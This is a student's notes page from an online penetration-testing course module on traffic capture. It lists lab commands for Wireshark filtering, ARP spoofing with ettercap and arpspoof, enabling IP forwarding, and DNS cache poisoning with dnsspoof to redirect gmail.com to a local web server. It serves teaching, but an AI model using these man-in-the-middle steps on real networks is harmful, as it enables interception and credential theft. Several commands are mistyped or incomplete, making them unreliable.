< All Advanced Penetration Testing Notes

Oishi | Advanced Penetration Testing | Module 6 - Traffic Capture

By: Oishi | Related Course: Advanced Penetration Testing | Published: July 25, 2017 | Modified: August 3, 2017
Join Cybrary

NotepadCapture Traffic (pt 2) analyzing Network


Tool : wireshark

Capture>interfaces > Eth0

Uncheck Use promiscous mode (if on the same network)

Open term. window- ping 192.16864.1.64 (example)

filter: ftp &&ip.dst==

Filter: ip.scr==||ftp &&ip.dst==

domain controller- ubuntu term.>>>


> enter name and pw

> dir

see the files listed> and in wiereshark






man in the middle

> ettercap -Ti eth0 -M arp:remote / /

arp spoof out come

> nano/proc/sys/net/ipv4/ip_forward

wireshark > filter TLSv1 or HTTP


>nano /etc/ettercap/ettercap.com

(turn off ipv4)



NotepadTraffic capture (arp)

Address Resolution Protocol (ARP)


translate the ip address to Mac address of the network Adapter

Tells host where to send traffic

If we can trick host into sending traffic to the wrong place we can capture traffic in wireshark


Kali =

windows xp


Ubuntu sends traffic destined to windows xp to kali >kali fowrads traffic to ubuntu 


Kali forwards traffic to windows xp> windows xp sends traffic destined for ubuntu to Kali    

—      —      —-     —– —- —    —-

Kali> arpspoof -i eth0 -t

>cat /proc/sys/net/ipv4/ip_forward

> echo /proc/sys/net/ipv4/ip_forward


>arp -a (for ubuntu and windows)

NotepadTraffic Capture DNS

DNS Cache Poisoning

>host.txt: www.gmail.com

Restart arpspoofing between gateway and target

>dnsspoof -i eth0 -f host.txt

> arpspoof -i eth0 -t (= says I am the gateway)

> nano hosts.txt

> www.gmail.com

>service apache2 start

>dnsspoof -i eth0 -f /roots/hosts.txt





< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?